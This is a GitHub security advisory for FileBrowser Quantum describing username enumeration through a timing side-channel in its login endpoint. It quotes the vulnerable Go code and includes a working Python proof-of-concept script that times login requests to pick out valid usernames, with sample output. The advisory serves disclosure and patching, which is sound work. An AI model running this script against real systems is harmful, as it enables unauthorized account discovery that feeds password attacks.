GHSA-7789-65HX-F26W
Vulnerability from github – Published: 2026-03-24 19:18 – Updated: 2026-03-24 19:18
VLAI?
Summary
FileBrowser Quantum has Username Enumeration via Authentication Timing Side-Channel
Details
Summary
The /api/auth/login authentication endpoint does not execute in constant time. When a non-existent username is supplied, the server returns a 401/403 response almost immediately. When a valid username is provided, the server performs a bcrypt password comparison, causing a measurable delay in the response time.
Details
The vulnerability exists in the Auth function of JSONAuth in auth/json.go (lines 45–52). The function performs a database lookup for the user prior to performing any password validation.
user, err := userStore.Get(username)
if err != nil {
return nil, fmt.Errorf("unable to get user from store: %v", err)
}
err = users.CheckPwd(password, user.Password)
if err != nil {
return nil, err
}
If the username is not found, the function returns an error immediately. If the username is found, the function calls CheckPwd, which executes the bcrypt hash comparison. Because bcrypt is intentionally computationally expensive, this introduces a measurable delay in the response time.
As a result, an attacker can distinguish valid usernames from invalid ones by measuring the authentication response times.
In testing, responses for valid usernames consistently required approximately 40–50 ms due to the bcrypt comparison, while invalid usernames returned in approximately 1–4 ms.
PoC
The script below automates this attack by calibrating the network latency using non-existent usernames to establish a baseline and then testing a list of target users. Valid usernames are detected when the response time exceeds the baseline.
import requests
import time
import statistics
# Configuration - adjust domain and wordlist as appropriate
TARGET_URL = "http://localhost/api/auth/login"
WORDLIST = ["admin", "root", "user2", "nonexistent_test_user"]
def measure(username):
start = time.perf_counter()
requests.post(TARGET_URL, params={"username": username}, headers={"X-Password": "wrong-password"})
return time.perf_counter() - start
# 1. Baseline Calibration
print("[*] Calibrating...")
baselines = [measure(f"not_a_user_{i}") for i in range(20)]
threshold = statistics.mean(baselines) + (statistics.stdev(baselines) * 5)
print(f"[*] Baseline: {statistics.mean(baselines):.4f}s | Threshold: {threshold:.4f}s")
# 2. Validation Test
for user in WORDLIST:
t = measure(user)
status = "VALID" if t > threshold else "invalid"
print(f"{user:<15} | {t:.4f}s | {status}")
Example output (with admin and user2 configured as valid users in the application):
$ python timeattack.py
[*] Calibrating...
[*] Baseline: 0.0041s | Threshold: 0.0256s
admin | 0.0505s | VALID
root | 0.0019s | invalid
user2 | 0.0464s | VALID
nonexistent_test_user | 0.0015s | invalid
Impact
An unauthenticated attacker can enumerate valid usernames by measuring authentication response times.
Severity ?
5.3 (Medium)
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/gtsteffaniak/filebrowser/backend"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.0.0-20260317230626-af08800667b8"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-208"
],
"github_reviewed": true,
"github_reviewed_at": "2026-03-24T19:18:56Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "### Summary\n\nThe `/api/auth/login` authentication endpoint does not execute in constant time. When a non-existent username is supplied, the server returns a `401`/`403` response almost immediately. When a valid username is provided, the server performs a bcrypt password comparison, causing a measurable delay in the response time.\n\n### Details\n\nThe vulnerability exists in the `Auth` function of `JSONAuth` in `auth/json.go` (lines 45\u201352). The function performs a database lookup for the user prior to performing any password validation.\n\n```go\nuser, err := userStore.Get(username)\n\tif err != nil {\n\t\treturn nil, fmt.Errorf(\"unable to get user from store: %v\", err)\n\t}\n\terr = users.CheckPwd(password, user.Password)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n```\n\nIf the username is not found, the function returns an error immediately. If the username is found, the function calls `CheckPwd`, which executes the bcrypt hash comparison. Because bcrypt is intentionally computationally expensive, this introduces a measurable delay in the response time.\n\nAs a result, an attacker can distinguish valid usernames from invalid ones by measuring the authentication response times.\n\nIn testing, responses for valid usernames consistently required approximately 40\u201350 ms due to the bcrypt comparison, while invalid usernames returned in approximately 1\u20134 ms.\n\n### PoC\n\nThe script below automates this attack by calibrating the network latency using non-existent usernames to establish a baseline and then testing a list of target users. Valid usernames are detected when the response time exceeds the baseline.\n\n```python\nimport requests\nimport time\nimport statistics\n\n# Configuration - adjust domain and wordlist as appropriate\nTARGET_URL = \"http://localhost/api/auth/login\"\nWORDLIST = [\"admin\", \"root\", \"user2\", \"nonexistent_test_user\"]\n\ndef measure(username):\n start = time.perf_counter()\n requests.post(TARGET_URL, params={\"username\": username}, headers={\"X-Password\": \"wrong-password\"})\n return time.perf_counter() - start\n\n# 1. Baseline Calibration\nprint(\"[*] Calibrating...\")\nbaselines = [measure(f\"not_a_user_{i}\") for i in range(20)]\nthreshold = statistics.mean(baselines) + (statistics.stdev(baselines) * 5)\nprint(f\"[*] Baseline: {statistics.mean(baselines):.4f}s | Threshold: {threshold:.4f}s\")\n\n# 2. Validation Test\nfor user in WORDLIST:\n t = measure(user)\n status = \"VALID\" if t \u003e threshold else \"invalid\"\n print(f\"{user:\u003c15} | {t:.4f}s | {status}\")\n```\n\nExample output (with `admin` and `user2` configured as valid users in the application):\n\n```\n$ python timeattack.py\n[*] Calibrating...\n[*] Baseline: 0.0041s | Threshold: 0.0256s\nadmin | 0.0505s | VALID\nroot | 0.0019s | invalid\nuser2 | 0.0464s | VALID\nnonexistent_test_user | 0.0015s | invalid\n```\n\n### Impact\n\nAn unauthenticated attacker can enumerate valid usernames by measuring authentication response times.",
"id": "GHSA-7789-65hx-f26w",
"modified": "2026-03-24T19:18:56Z",
"published": "2026-03-24T19:18:56Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/gtsteffaniak/filebrowser/security/advisories/GHSA-7789-65hx-f26w"
},
{
"type": "WEB",
"url": "https://github.com/gtsteffaniak/filebrowser/commit/af08800667b874620edc6f44c3e2e64fec7abd85"
},
{
"type": "PACKAGE",
"url": "https://github.com/gtsteffaniak/filebrowser"
},
{
"type": "WEB",
"url": "https://github.com/gtsteffaniak/filebrowser/releases/tag/v1.3.2-beta"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
"type": "CVSS_V3"
}
],
"summary": "FileBrowser Quantum has Username Enumeration via Authentication Timing Side-Channel"
}
Loading…
Loading…
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…